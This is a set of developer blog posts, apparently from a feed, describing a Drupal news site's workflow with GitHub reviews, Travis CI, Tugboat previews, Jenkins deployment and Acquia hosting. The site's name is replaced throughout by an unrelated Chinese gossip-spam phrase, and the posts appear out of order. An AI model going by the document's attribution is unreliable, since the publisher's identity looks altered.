The post Getting Started with Patches appeared first on 国产吃瓜黑料 Online.
How is this site built? What tools help our developers? What are some of the best practices? What have we learned?
The questions above are some of the reasons why we are starting this developer column. We want to share with the community and the world some of what we have learned while building 国产吃瓜黑料 Online so that, if the time ever comes for you to build your own site, you have the resources to succeed. As developers, we run into problems and challenges every day – from optimizing our page load to deliver the fastest possible experience to crafting beautiful designs that work on all devices. In the course of solving these problems, we often learn new skills, new API calls, new functionality, and new ways to work smarter, better, and more efficiently.
国产吃瓜黑料 Online is built off of Drupal, an open source content management system, which we have extended with custom modules, themes, and designs. Our site has been upgraded and enhanced to provide an extremely fast load time, designs optimized for all devices, and many more features so that the experience you have on 国产吃瓜黑料 Online is the best possible one.
Stay tuned for more posts about developing at 国产吃瓜黑料 Online, from tutorials to informational rundowns. We hope this is a resource for you as you work on your own projects.
The post Welcome to the 国产吃瓜黑料 Developer Blog appeared first on 国产吃瓜黑料 Online.
This first post is going to touch on some of the build tools and systems we use to manage our code, our development, and most importantly, our deployment. 国产吃瓜黑料's development cycle is fluid and agile: we can deploy code at any time and have changes and updates visible to our users within minutes. (We avoid merges on Friday afternoons.) With our development cycle, we need to make sure all our code is properly reviewed and tested before we deploy to production.
Here's a basic outline of the process all code changes must go through before going live. I'm going to describe each step and explain why each is critical to the development process.
Version control is the most critical aspect of our development process. With Git and GitHub, we're able to manage all of our code and work together collaboratively without (too much) conflict. GitHub is also our source of issue management, workflow, sprint planning, and pull-request (PR) review. This post isn't going to dive into the intricacies of Git, but I wanted to share what a usual cycle for a developer is, at a very high level:
Product creates and assigns a ticket
Developer creates a branch off of Master for that ticket
Developer fixes the issue or implements the feature
Developer creates a pull request on GitHub to merge the code back into master
Once a developer has finished a ticket, he or she creates a pull request in GitHub.
While a developer is creating a pull request, he or she asks other developers to review the code by using GitHub's “reviewers” functionality. All reviewers must approve the PR before it can get merged in. This is fairly standard practice in all coding environments – fellow developers can help you identify whether you have forgotten an important piece of the ticket, made spelling mistakes, or done anything else that might cause problems on the live site.
When creating a PR, we have two supplementary tools that we use to help with the testing and review process: Travis CI and Tugboat.
Travis is a continuous integration tool for developers and teams; its pitch is “Focus on writing code. Let Travis CI take care of running your tests and deploying your apps.” By using Travis, and other continuous-integration tools, developers can avoid merging large code changes at the end of a cycle and instead merge code more frequently to avoid conflicts and errors.
For us, Travis is a continuous-integration tool that does a few important tasks:
Checks code style using PHP CodeSniffer as our syntax guideline
Confirms all javascript has been minified and zero un-minified JS files have been pushed
Alerts all necessary users of errors through email alerts
We can take a quick peek into some of the benefits of using Travis.
If a build is successful, Travis passes and returns a detailed view with information such as how long the process took and any custom output from the task.
If a build fails, Travis is helpful in multiple ways. First, the PR will have a big ol' X next to it in GitHub. That is our main clue to a failing PR. The developer of the PR will also get an email saying the Travis tests have failed. Next, it's also pretty easy to debug why the PR failed. On the Travis site, you can clearly see that the PR failed, and you are also able to see why: our code failed our linter.
Tugboat, the second tool that we use on every pull request, creates a replica of our production (live) environment that includes the changes made in the pull request. This includes builds that match our production environment, executed build scripts, and code fully merged with master to check mergeability. This way, developers and testers can see how the implemented changes interact outside of the local environment – both back-end and front-end changes. A neat feature is that a unique URL is generated for each PR, and that URL is easily shareable. So if we have a large feature that needs sign-off from a client, we can easily share a unique URL for others to review.
Tugboat also runs tests to make sure the PR doesn't break major features or functionalities on our site. We use CasperJS and Behat for our frontend JavaScript and behavioral tests.
I'm not going to dive into the inner workings of CasperJS and Behat, but, on a high level, CasperJS tests any JavaScript interactions, and Behat is more behavior-driven. For us, CasperJS makes sure that important elements (such as ads) are appearing. Behat ensures that editors can log in successfully, that certain pages are displaying correctly, and that certain flows still work throughout the site. To learn more about CasperJS, or about using Behat with Drupal, check out their respective documentation.
As you can see, the PR process is fairly extensive at 国产吃瓜黑料, but it provides a quicker and more efficient code-review process. Reviewers don't have to worry about whether the PR will break the site – instead they can focus on the actual implementation and code being changed. If either Travis or Tugboat fails, then everyone knows that the code is not production-ready.
Once Travis passes, Tugboat builds, and the PR has been approved by all the reviewers, the code is ready to be deployed to production. We don't have one person who “pushes to master” on production every time there is an update – that would be extremely tedious and error-prone. Instead, we use a tool called Jenkins to help with our deployment.
Jenkins is an automation server that helps “support building, deploying, and automating any project.” There are many use cases for Jenkins, including deployment, running tests, and building prototypes.
Jenkins does 2 main tasks for us:
It deploys code to Production: obviously the most important
It copies the Production database to our Staging environment (nightly)
For deployment to our production environment, Jenkins streamlines the process while still using the same commands you'd expect. There are only four steps in Jenkins that push the code to the live site – git checkout, git pull, git fetch, and git push – but, with Jenkins, we as developers don't have to worry about doing that ourselves. We can just click “Merge” on GitHub and the Jenkins process will be fired off.
Jenkins can also do a whole slew of things with hooks. We have it set up so that every deployment is logged in New Relic, and email/Slack alerts go out for every successful or failed job.
With the tools mentioned above, we're able to develop and deploy whenever we need to. Hot fix on the weekend? As long as it passes Travis, Tugboat, and the reviewers, there is no need to wait until the workweek – that fix can go out. Need client approval for a feature? Send over a Tugboat link to get that signoff.
But you may be asking yourself, where does 国产吃瓜黑料 Online live? We use the Acquia platform to host our website and handle the more devops-like tasks. With Acquia, we don't have to worry about scaling, servers, or anything related to keeping our website up (well, besides bad code). When our Jenkins job runs, it pushes our code to Acquia, which then updates the server and the site. Acquia hosts our production website, but it also hosts our development and staging environments. These two environments provide real-world-type environments that more accurately represent what the code will be like on production. If we are ever worried about performance or how code will interact in production, we test our code in the Acquia dev and stage environments before merging.
Even though we thoroughly appreciate and enjoy our workflow, we know, with the number of tools released each year, that we need to stay on top of the latest trends. We currently do not use a tool to measure code quality, but a quick survey of the landscape shows that there are a number of code-quality tools to help us write better code. Code quality can include anything from code complexity (too many if or for loops) to naming conventions. These are opportunities that we're constantly evaluating and attempting to integrate into our backlog.
Our process allows the whole team to work cohesively and efficiently while also managing our codebase. We have thoroughly enjoyed using Tugboat to test our pull requests in a replica environment, Travis to check our code quality, and Jenkins to deploy our code without any headaches. If you are in the process of starting a new project or have an existing project that is getting too heavy to manage, we recommend these tools to help take load off of the developers and allow them to build better and faster.
The post Code Management and Deployment at 国产吃瓜黑料 appeared first on 国产吃瓜黑料 Online.